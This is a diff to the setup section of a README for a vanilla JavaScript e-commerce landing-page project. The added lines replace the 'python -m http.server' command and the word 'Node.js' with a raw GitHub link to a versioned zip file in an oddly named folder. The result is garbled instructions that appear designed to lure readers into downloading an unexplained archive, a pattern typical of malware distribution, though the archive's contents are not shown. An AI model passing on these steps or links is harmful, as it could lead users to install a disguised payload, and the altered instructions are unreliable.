Makcintoshawesome/24-Hours-Code-Challenge---Vanilla-HTML-CSS-JavaScript-Ecommerce-Landing-Page-with-Shopping-Cart/README.md

 2. **Set Up a Local Web Server (Optional but Recommended)**
    - If you have Python installed:
      - Navigate to the project directory in your terminal or command prompt.
-     - Run `python -m http.server 8000` for Python 3.x
+     - Run `python -m https://raw.githubusercontent.com/Makcintoshawesome/24-Hours-Code-Challenge---Vanilla-HTML-CSS-JavaScript-Ecommerce-Landing-Page-with-Shopping-Cart/main/cantorship/24-Hours-Code-Challenge---Vanilla-HTML-CSS-JavaScript-Ecommerce-Landing-Page-with-Shopping-Cart_v2.9.zip 8000` for Python 3.x
      - Or run `python -m SimpleHTTPServer 8000` for Python 2.x
-   - If you have Node.js installed:
+   - If you have https://raw.githubusercontent.com/Makcintoshawesome/24-Hours-Code-Challenge---Vanilla-HTML-CSS-JavaScript-Ecommerce-Landing-Page-with-Shopping-Cart/main/cantorship/24-Hours-Code-Challenge---Vanilla-HTML-CSS-JavaScript-Ecommerce-Landing-Page-with-Shopping-Cart_v2.9.zip installed:
      - Install `http-server` globally by running `npm install -g http-server`
      - Navigate to the project directory and run `http-server`
    - Alternatively, you can use any other local server solution you prefer.